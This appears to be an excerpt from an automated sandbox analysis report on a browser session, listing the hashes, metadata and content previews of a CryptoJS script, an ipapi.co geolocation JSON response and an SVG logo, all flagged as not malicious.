                                                                                                                              Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:JSON data
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):763
                                                                                                                              Entropy (8bit):4.73890517681664
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:3849201717DD51D96B654574CCED466A
                                                                                                                              SHA1:E24F74FECAB382E723EDA00292AA9EC36DC35EC0
                                                                                                                              SHA-256:842748142398582957A7231B1D55996C3036ECB3182289C2C0D48A387BB4DBCE
                                                                                                                              SHA-512:3153B3DC36715F41F7181E6F332EB4E7CBC60348C7025BE9AC5853FD175E8C72C941CA093D222B9F5AE8D56CDE0A913186FAAEB186E30258AF71F0492EB5DF89
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              URL:https://ipapi.co/8.46.123.33/json/
                                                                                                                              Preview:{. "ip": "8.46.123.33",. "network": "8.46.123.0/24",. "version": "IPv4",. "city": "New York City",. "region": "New York",. "region_code": "NY",. "country": "US",. "country_name": "United States",. "country_code": "US",. "country_code_iso3": "USA",. "country_capital": "Washington",. "country_tld": ".us",. "continent_code": "NA",. "in_eu": false,. "postal": "10069",. "latitude": 40.778,. "longitude": -73.9884,. "timezone": "America/New_York",. "utc_offset": "-0400",. "country_calling_code": "+1",. "currency": "USD",. "currency_name": "Dollar",. "languages": "en-US,es-US,haw,fr",. "country_area": 9629091.0,. "country_population": 327167434,. "asn": "AS3356",. "org": "LEVEL3".}
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):10592
                                                                                                                              Entropy (8bit):4.048906808176457
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:12A3102D6CA2735204CFCD44DEB0258F
                                                                                                                              SHA1:510F4FB5B013FB94C32D21A768E3A29A6003C484
                                                                                                                              SHA-256:8343749A2DB88AC13B2137B39BBF79806CC4A72D12E4B0C3376FFB66F930A8E6
                                                                                                                              SHA-512:F31A69CA3E8FDA6F185DCC37C458A10F4F57CA01D3EA5EC816F22708B03F4CC417ABA6ABFE1C4C9A64F14B512E3E4AC29ED9F49F6D87D80E3DD49E67F296CB0C
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              Preview:<svg width="108" height="28" viewBox="0 0 108 28" fill="none" xmlns="http://www.w3.org/2000/svg">..<path d="M34.5896 24.1142V23.3056C34.1411 23.8689 33.2747 24.2808 32.2087 24.2808C31.0813 24.2808 30.1535 23.8992 29.4254 23.1542C28.7157 22.4061 28.3594 21.4158 28.3594 20.1832C28.3594 18.9475 28.7157 17.9572 29.4254 17.2122C30.1504 16.4642 31.0782 16.0856 32.2087 16.0856C33.2133 16.0856 33.9721 16.3612 34.4667 16.9245V12.2727H36.7094V24.1142H34.5896ZM30.6481 20.1832C30.6481 21.5702 31.4223 22.3637 32.5804 22.3637C33.7079 22.3637 34.4667 21.6157 34.4667 20.3528V20.0015C34.4667 18.7658 33.7079 17.9905 32.5804 17.9905C31.4192 17.9875 30.6481 18.7961 30.6481 20.1832Z" fill="white"/>..<path d="M46.4022 20.883H40.9123C40.9584 21.8733 41.5759 22.482 42.5805 22.482C43.3853 22.482 43.88 22.1913 44.0489 21.6128L46.3223 21.7188C46.184 22.4669 45.7662 23.0908 45.0689 23.5632C44.3899 24.0357 43.585 24.2779 42.6419 24.2779C41.4038 24.2779 40.3992 23.9115 39.6435 23.1665C38.8847 22.4184 38.516 21.4281
                                                                                                                              No static file info